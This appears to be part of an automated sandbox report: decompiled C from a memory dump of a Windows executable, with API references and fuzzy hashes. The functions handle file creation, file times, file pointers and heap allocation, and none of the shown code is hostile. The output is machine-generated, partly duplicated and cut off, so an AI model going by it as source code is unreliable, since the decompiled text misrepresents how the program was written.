          					_t74 = E0020D82C(_t86, _t89, _t98, 0x82e8);
          					 *((intOrPtr*)(_t91 + 8)) = _t74;
          					 *((char*)(_t91 - 4)) = 5;
          					if(_t74 == 0) {
          						_t64 = 0;
          					} else {
          						_t64 = E001FAD1B(_t74); // executed
          					}
          				}
          				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
          				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
          				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
          				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
          				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
          				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
          				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
          				 *((char*)(_t89 + 0x6cbc)) = 0;
          				 *((short*)(_t89 + 0x6cc4)) = 0;
          				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
          				E0020E920(_t87, _t89 + 0x2208, 0, 0x40);
          				E0020E920(_t87, _t89 + 0x2248, 0, 0x34);
          				E0020E920(_t87, _t89 + 0x4590, 0, 0x20);
          				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
          				 *((short*)(_t89 + 0x6cfa)) = 0;
          				 *((char*)(_t89 + 0x6cd6)) = 0;
          				 *((char*)(_t89 + 0x6cf8)) = 0;
          				 *((char*)(_t89 + 0x21e0)) = 0;
          				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
          				return _t89;
          			}

          APIs
          • __EH_prolog.LIBCMT ref: 001F1382
            • Part of subcall function 001F5E99: __EH_prolog.LIBCMT ref: 001F5E9E
            • Part of subcall function 001FC4CA: __EH_prolog.LIBCMT ref: 001FC4CF
            • Part of subcall function 001FC4CA: new.LIBCMT ref: 001FC512
            • Part of subcall function 001FC4CA: new.LIBCMT ref: 001FC536
          • new.LIBCMT ref: 001F13FA
            • Part of subcall function 001FAD1B: __EH_prolog.LIBCMT ref: 001FAD20
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: c77d2f108f38a8a0aea241fba49e9b3b2d9bae991d79ae158508f22cc60e9da5
          • Instruction ID: fe59a6184af89df16e725dd76417d0a9dde01c5c1393865168eba2787c748ed1
          • Opcode Fuzzy Hash: c77d2f108f38a8a0aea241fba49e9b3b2d9bae991d79ae158508f22cc60e9da5
          • Instruction Fuzzy Hash: 434106B0905B44DED725DF798485AE6FBE5FF28300F504A2ED6EE83282CB326554CB51
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 98%
          			E001F137D(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
          				void* __esi;
          				signed int _t62;
          				signed int _t63;
          				char _t64;
          				intOrPtr _t74;
          				intOrPtr* _t78;
          				void* _t86;
          				void* _t87;
          				intOrPtr* _t89;
          				void* _t91;
          				void* _t96;
          
          				_t96 = __eflags;
          				_t87 = __edi;
          				_t86 = __edx;
          				_t78 = __ecx;
          				E0020D870(E00221157, _t91);
          				_push(_t78);
          				_t89 = _t78;
          				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
          				E001F943C(_t78);
          				 *_t89 = 0x2222e8;
          				 *((intOrPtr*)(_t91 - 4)) = 0;
          				E001F5E99(_t89 + 0x1024, _t86, _t96);
          				 *((char*)(_t91 - 4)) = 1;
          				E001FC4CA(_t89 + 0x20e8, _t86, _t96);
          				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
          				E001F151B();
          				_t62 = E001F151B();
          				 *((char*)(_t91 - 4)) = 4;
          				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
          				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
          				 *(_t89 + 0x21b8) = _t63;
          				_t98 = _t63;
          				if(_t63 == 0) {
          					_t64 =  *((intOrPtr*)(_t91 + 8));
          				} else {
          					_t74 = E0020D82C(_t86, _t89, _t98, 0x82e8);
          					 *((intOrPtr*)(_t91 + 8)) = _t74;
          					 *((char*)(_t91 - 4)) = 5;
          					if(_t74 == 0) {
          						_t64 = 0;
          					} else {
          						_t64 = E001FAD1B(_t74); // executed
          					}
          				}
          				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
          				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
          				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
          				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
          				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
          				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
          				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
          				 *((char*)(_t89 + 0x6cbc)) = 0;
          				 *((short*)(_t89 + 0x6cc4)) = 0;
          				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
          				E0020E920(_t87, _t89 + 0x2208, 0, 0x40);
          				E0020E920(_t87, _t89 + 0x2248, 0, 0x34);
          				E0020E920(_t87, _t89 + 0x4590, 0, 0x20);
          				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
          				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
          				 *((short*)(_t89 + 0x6cfa)) = 0;
          				 *((char*)(_t89 + 0x6cd6)) = 0;
          				 *((char*)(_t89 + 0x6cf8)) = 0;
          				 *((char*)(_t89 + 0x21e0)) = 0;
          				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
          				return _t89;
          			}

          APIs
          • __EH_prolog.LIBCMT ref: 001F1382
            • Part of subcall function 001F5E99: __EH_prolog.LIBCMT ref: 001F5E9E
            • Part of subcall function 001FC4CA: __EH_prolog.LIBCMT ref: 001FC4CF
            • Part of subcall function 001FC4CA: new.LIBCMT ref: 001FC512
            • Part of subcall function 001FC4CA: new.LIBCMT ref: 001FC536
          • new.LIBCMT ref: 001F13FA
            • Part of subcall function 001FAD1B: __EH_prolog.LIBCMT ref: 001FAD20
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: 869ce7f7936ddab774e4ceb6494bed9b4db6292f84433df68fd85c409c0f3ae8
          • Instruction ID: 92734cc2eff130f1c2bd71198de67e0aedef6266c93980a378c3a0b0b71701e7
          • Opcode Fuzzy Hash: 869ce7f7936ddab774e4ceb6494bed9b4db6292f84433df68fd85c409c0f3ae8
          • Instruction Fuzzy Hash: DB4128B0905B44DED725DF798485AE6FBE5FF29300F504A2ED6EE83282CB326564CB11
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 95%
          			E0021A6B2(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
          				char _v8;
          				char _v16;
          				void* __edi;
          				void* __esi;
          				void* __ebp;
          				char _t31;
          				signed int _t36;
          				char _t40;
          				intOrPtr _t44;
          				char _t45;
          				signed int _t51;
          				void* _t64;
          				void* _t70;
          				signed int _t75;
          				void* _t81;
          
          				_t81 = __eflags;
          				_v8 = E00218516(__ebx, __ecx, __edx);
          				E0021A7D1(__ebx, __ecx, __edx, _t81);
          				_t31 = E0021A446(_t81, _a4);
          				_v16 = _t31;
          				_t57 =  *(_v8 + 0x48);
          				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
          					return 0;
          				}
          				_push(__ebx);
          				_t70 = E00217A8A(_t57, 0x220);
          				_t51 = __ebx | 0xffffffff;
          				__eflags = _t70;
          				if(__eflags == 0) {
          					L5:
          					_t75 = _t51;
          					goto L6;
          				} else {
          					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
          					 *_t70 =  *_t70 & 0x00000000; // executed
          					_t36 = E0021A873(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
          					_t75 = _t36;
          					__eflags = _t75 - _t51;
          					if(_t75 != _t51) {
          						__eflags = _a8;
          						if(_a8 == 0) {
          							E00217847();
          						}
          						asm("lock xadd [eax], ebx");
          						__eflags = _t51 == 1;
          						if(_t51 == 1) {
          							_t45 = _v8;
          							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x22db20;
          							if( *((intOrPtr*)(_t45 + 0x48)) != 0x22db20) {
          								E00217A50( *((intOrPtr*)(_t45 + 0x48)));
          							}
          						}
          						 *_t70 = 1;
          						_t64 = _t70;
          						_t70 = 0;
          						 *(_v8 + 0x48) = _t64;
          						_t40 = _v8;
          						__eflags =  *(_t40 + 0x350) & 0x00000002;
          						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
          							__eflags =  *0x22dda0 & 0x00000001;
          							if(( *0x22dda0 & 0x00000001) == 0) {
          								_v16 =  &_v8;
          								E0021A31C(5,  &_v16);
          								__eflags = _a8;
          								if(_a8 != 0) {
          									_t44 =  *0x22dd40; // 0xdb22b0
          									 *0x22d814 = _t44;
          								}
          							}
          						}
          						L6:
          						E00217A50(_t70);
          						return _t75;
          					} else {
          						 *((intOrPtr*)(E00217ECC())) = 0x16;
          						goto L5;
          					}
          				}
          			}

          APIs
            • Part of subcall function 00218516: GetLastError.KERNEL32(?,002300E0,00213394,002300E0,?,?,00212E0F,?,?,002300E0), ref: 0021851A
            • Part of subcall function 00218516: _free.LIBCMT ref: 0021854D
            • Part of subcall function 00218516: SetLastError.KERNEL32(00000000,?,002300E0), ref: 0021858E
            • Part of subcall function 00218516: _abort.LIBCMT ref: 00218594
            • Part of subcall function 0021A7D1: _abort.LIBCMT ref: 0021A803
            • Part of subcall function 0021A7D1: _free.LIBCMT ref: 0021A837
            • Part of subcall function 0021A446: GetOEMCP.KERNEL32(00000000,?,?,0021A6CF,?), ref: 0021A471
          • _free.LIBCMT ref: 0021A72A
          • _free.LIBCMT ref: 0021A760
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: _free$ErrorLast_abort
          • String ID:
          • API String ID: 2991157371-0
          • Opcode ID: 183465bda4bba6af15e681abda7e1ccff5850827c86e5593b57bb07abd2b752c
          • Instruction ID: bf454d90d037119a569705ae8492990f728d16837a733b718727663b537de00e
          • Opcode Fuzzy Hash: 183465bda4bba6af15e681abda7e1ccff5850827c86e5593b57bb07abd2b752c
          • Instruction Fuzzy Hash: BA31D431915205AFDB10EFA8D845BEDB7F4EF60360F25409AE4049B2E1EB719EA2CF51
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001F9528(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
          				long _v0;
          				signed char _t34;
          				signed int _t36;
          				void* _t37;
          				signed char _t46;
          				struct _SECURITY_ATTRIBUTES* _t47;
          				long _t56;
          				void* _t59;
          				long _t63;
          
          				E0020D940();
          				_t46 = _a4108;
          				_t34 = _t46 >> 0x00000001 & 0x00000001;
          				_t59 = __ecx;
          				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
          					_t63 = 1;
          					__eflags = 1;
          				} else {
          					_t63 = 0;
          				}
          				 *(_t59 + 0x18) = _t46;
          				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
          				_t36 =  *(E001FB927(_t34, _a4104)) & 0x0000ffff;
          				if(_t36 == 0x2e || _t36 == 0x20) {
          					if((_t46 & 0x00000020) != 0) {
          						goto L8;
          					} else {
          						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
          						_t47 = 0;
          						_t56 = _v0;
          					}
          				} else {
          					L8:
          					_t56 = _v0;
          					_t47 = 0;
          					__eflags = 0;
          					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
          					 *(_t59 + 4) = _t37;
          				}
          				if( *(_t59 + 4) == 0xffffffff && E001FB32C(_a4104,  &_a4, 0x800) != 0) {
          					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
          				}
          				 *((char*)(_t59 + 0x12)) = 1;
          				 *(_t59 + 0xc) = _t47;
          				 *(_t59 + 0x10) = _t47;
          				return E001FFAB1(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
          			}

          APIs
          • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,001F9BF3,?,?,001F76AC), ref: 001F95B0
          • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,001F9BF3,?,?,001F76AC), ref: 001F95E5
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: CreateFile
          • String ID:
          • API String ID: 823142352-0
          • Opcode ID: 64e0105e07cae693f7a2ffbb56a7c251e784baca073da2e786572d57f6bf8cc1
          • Instruction ID: 26a5153863e95c9163aad369328abe1316a1579e9bf308dfa28db472a9356c46
          • Opcode Fuzzy Hash: 64e0105e07cae693f7a2ffbb56a7c251e784baca073da2e786572d57f6bf8cc1
          • Instruction Fuzzy Hash: 5321E1B100474CAFE7319F54C885BB777E8EB49368F004A2EF6D5821E2C3B5AD498A61
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 84%
          			E001F9A7E(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
          				void* _v8;
          				void* _v16;
          				void* _v24;
          				signed char _v25;
          				int _t34;
          				signed char _t49;
          				signed int* _t51;
          				signed char _t57;
          				void* _t58;
          				void* _t59;
          				signed int* _t60;
          				signed int* _t62;
          
          				_t59 = __esi;
          				_t58 = __ecx;
          				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
          					FlushFileBuffers( *(__ecx + 4));
          				}
          				_t51 = _a4;
          				_t49 = 1;
          				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
          					_t57 = 0;
          				} else {
          					_t57 = 1;
          				}
          				_push(_t59);
          				_t60 = _a8;
          				_v25 = _t57;
          				if(_t60 == 0) {
          					L9:
          					_a4 = 0;
          				} else {
          					_a4 = _t49;
          					if(( *_t60 | _t60[1]) == 0) {
          						goto L9;
          					}
          				}
          				_t62 = _a12;
          				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
          					_t49 = 0;
          				}
          				if(_t57 != 0) {
          					E0020082F(_t51, _t57,  &_v24);
          				}
          				if(_a4 != 0) {
          					E0020082F(_t60, _t57,  &_v8);
          				}
          				if(_t49 != 0) {
          					E0020082F(_t62, _t57,  &_v16);
          				}
          				asm("sbb eax, eax");
          				asm("sbb eax, eax");
          				asm("sbb eax, eax");
          				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
          				return _t34;
          			}
















          APIs
          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,001F738C,?,?,?), ref: 001F9A98
          • SetFileTime.KERNELBASE(?,?,?,?), ref: 001F9B48
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: File$BuffersFlushTime
          • String ID:
          • API String ID: 1392018926-0
          • Opcode ID: 0bfa9e279f7b8c60f296ce34a4dbebb387f132aa00b81cfe7361e17033854f63
          • Instruction ID: 62c236f3f180aa4faf583187f2cb1b4e139bf7a62072f12279a11fe27d135052
          • Opcode Fuzzy Hash: 0bfa9e279f7b8c60f296ce34a4dbebb387f132aa00b81cfe7361e17033854f63
          • Instruction Fuzzy Hash: 8821D331258389AFC711EE24D891BBBBBE4BF95304F08092DB981C7192D725ED08CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 90%
          			E00219990(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
          				struct HINSTANCE__* _t13;
          				signed int* _t20;
          				signed int _t27;
          				signed int _t28;
          				signed int _t29;
          				signed int _t33;
          				intOrPtr* _t34;
          
          				_t20 = 0x2507b8 + _a4 * 4;
          				_t27 =  *0x22d668; // 0x4319796a
          				_t29 = _t28 | 0xffffffff;
          				_t33 = _t27 ^  *_t20;
          				asm("ror esi, cl");
          				if(_t33 == _t29) {
          					L14:
          					return 0;
          				}
          				if(_t33 == 0) {
          					_t34 = _a12;
          					if(_t34 == _a16) {
          						L7:
          						_t13 = 0;
          						L8:
          						if(_t13 == 0) {
          							L13:
          							_push(0x20);
          							asm("ror edi, cl");
          							 *_t20 = _t29 ^ _t27;
          							goto L14;
          						}
          						_t33 = GetProcAddress(_t13, _a8);
          						if(_t33 == 0) {
          							_t27 =  *0x22d668; // 0x4319796a
          							goto L13;
          						}
          						 *_t20 = E0020DB10(_t33);
          						goto L2;
          					} else {
          						goto L4;
          					}
          					while(1) {
          						L4:
          						_t13 = E00219A2C( *_t34); // executed
          						if(_t13 != 0) {
          							break;
          						}
          						_t34 = _t34 + 4;
          						if(_t34 != _a16) {
          							continue;
          						}
          						_t27 =  *0x22d668; // 0x4319796a
          						goto L7;
          					}
          					_t27 =  *0x22d668; // 0x4319796a
          					goto L8;
          				}
          				L2:
          				return _t33;
          			}











          APIs
          • GetProcAddress.KERNEL32(00000000,?), ref: 002199F0
          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 002199FD
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AddressProc__crt_fast_encode_pointer
          • String ID:
          • API String ID: 2279764990-0
          • Opcode ID: 91f4c9a94a30633182f7c161c5bb1cf9c3e71f6cf69fc8e31586a1a935aac84e
          • Instruction ID: ed3016065c572d947219523efd3cb00ebf34b732e7f117e91963d1d0ea976f09
          • Opcode Fuzzy Hash: 91f4c9a94a30633182f7c161c5bb1cf9c3e71f6cf69fc8e31586a1a935aac84e
          • Instruction Fuzzy Hash: 57110A37A212229B9F31DE68FC648EA73D99F943207164120FC14AB284D630ECE5CAD0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 89%
          			E001F9B57() {
          				long _v4;
          				void* __ecx;
          				void* __ebp;
          				long _t12;
          				signed int _t14;
          				signed int _t21;
          				signed int _t22;
          				void* _t23;
          				long _t32;
          				void* _t34;
          
          				_t34 = _t23;
          				_t22 = _t21 | 0xffffffff;
          				if( *(_t34 + 4) != _t22) {
          					L3:
          					_v4 = _v4 & 0x00000000;
          					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
          					_t32 = _t12;
          					if(_t32 != _t22 || GetLastError() == 0) {
          						L7:
          						asm("cdq");
          						_t14 = 0 + _t32;
          						asm("adc edx, 0x0");
          						goto L8;
          					} else {
          						if( *((char*)(_t34 + 0x14)) == 0) {
          							_t14 = _t22;
          							L8:
          							return _t14;
          						}
          						E001F6DE2(0x2300e0, 0x2300e0, _t34 + 0x1e);
          						goto L7;
          					}
          				}
          				if( *((char*)(_t34 + 0x14)) == 0) {
          					return _t22;
          				}
          				E001F6DE2(0x2300e0, 0x2300e0, _t34 + 0x1e);
          				goto L3;
          			}














          APIs
          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 001F9B8D
          • GetLastError.KERNEL32 ref: 001F9B99
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ErrorFileLastPointer
          • String ID:
          • API String ID: 2976181284-0
          • Opcode ID: 7644cbfbc8ccecb8b900b1acdc2efbd4901fdb5b01d249e0f3bc489e750c451a
          • Instruction ID: 155728530210bd1f201081596beac78884e095369fe671016675b1ded47ec981
          • Opcode Fuzzy Hash: 7644cbfbc8ccecb8b900b1acdc2efbd4901fdb5b01d249e0f3bc489e750c451a
          • Instruction Fuzzy Hash: C7019E713006486BE734AF69EC88B7AB7DAAB94314F14463EB282C26C0CB75D908C621
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 94%
          			E001F9903(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
          				long _t14;
          				void* _t17;
          				intOrPtr* _t19;
          				long _t21;
          				void* _t23;
          				long _t25;
          				long _t28;
          				long _t31;
          
          				_t19 = __ecx;
          				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
          					L13:
          					return 1;
          				}
          				_t28 = _a4;
          				_t25 = _a8;
          				_t31 = _t25;
          				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
          					_t21 = _a12;
          				} else {
          					_t21 = _a12;
          					if(_t21 != 0) {
          						if(_t21 != 1) {
          							_t17 = E001F96E1(_t23);
          						} else {
          							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
          						}
          						_t28 = _t28 + _t17;
          						asm("adc edi, edx");
          						_t21 = 0;
          					}
          				}
          				_a12 = _t25;
          				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
          				if(_t14 != 0xffffffff || GetLastError() == 0) {
          					goto L13;
          				} else {
          					return 0;
          				}
          			}












          APIs
          • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 001F9957
          • GetLastError.KERNEL32 ref: 001F9964
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ErrorFileLastPointer
          • String ID:
          • API String ID: 2976181284-0
          • Opcode ID: e630134cefc2b35d8f1d8656fc71a48aefb2393cacffd0a66d16ba56f4ac5b87
          • Instruction ID: 393192308e3c74c11a0202866a19c24517ff57b659f047418c2b3e36f451bfff
          • Opcode Fuzzy Hash: e630134cefc2b35d8f1d8656fc71a48aefb2393cacffd0a66d16ba56f4ac5b87
          • Instruction Fuzzy Hash: 0C01D8326001099B8F28AE699C44BBE7759BF51338707821DEB26CB251DBB0DD159661
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 96%
          			E00217B78(void* __ecx, void* __edx, void* _a4, long _a8) {
          				void* __esi;
          				void* _t4;
          				long _t7;
          				void* _t9;
          				void* _t13;
          				void* _t14;
          				long _t16;
          
          				_t13 = __edx;
          				_t10 = __ecx;
          				_t14 = _a4;
          				if(_t14 != 0) {
          					_t16 = _a8;
          					__eflags = _t16;
          					if(_t16 != 0) {
          						__eflags = _t16 - 0xffffffe0;
          						if(_t16 <= 0xffffffe0) {
          							while(1) {
          								_t4 = RtlReAllocateHeap( *0x250874, 0, _t14, _t16); // executed
          								__eflags = _t4;
          								if(_t4 != 0) {
          									break;
          								}
          								__eflags = E00217906();
          								if(__eflags == 0) {
          									goto L5;
          								}
          								_t7 = E00216763(_t10, _t13, _t16, __eflags, _t16);
          								_pop(_t10);
          								__eflags = _t7;
          								if(_t7 == 0) {
          									goto L5;
          								}
          							}
          							L7:
          							return _t4;
          						}
          						L5:
          						 *((intOrPtr*)(E00217ECC())) = 0xc;
          						L6:
          						_t4 = 0;
          						__eflags = 0;
          						goto L7;
          					}
          					E00217A50(_t14);
          					goto L6;
          				}
          				_t9 = E00217A8A(__ecx, _a8); // executed
          				return _t9;
          			}











          APIs
          • _free.LIBCMT ref: 00217B99
            • Part of subcall function 00217A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00212FA6,?,0000015D,?,?,?,?,00214482,000000FF,00000000,?,?), ref: 00217ABC
          • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,002300E0,001FCB18,?,?,?,?,?,?), ref: 00217BD5
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
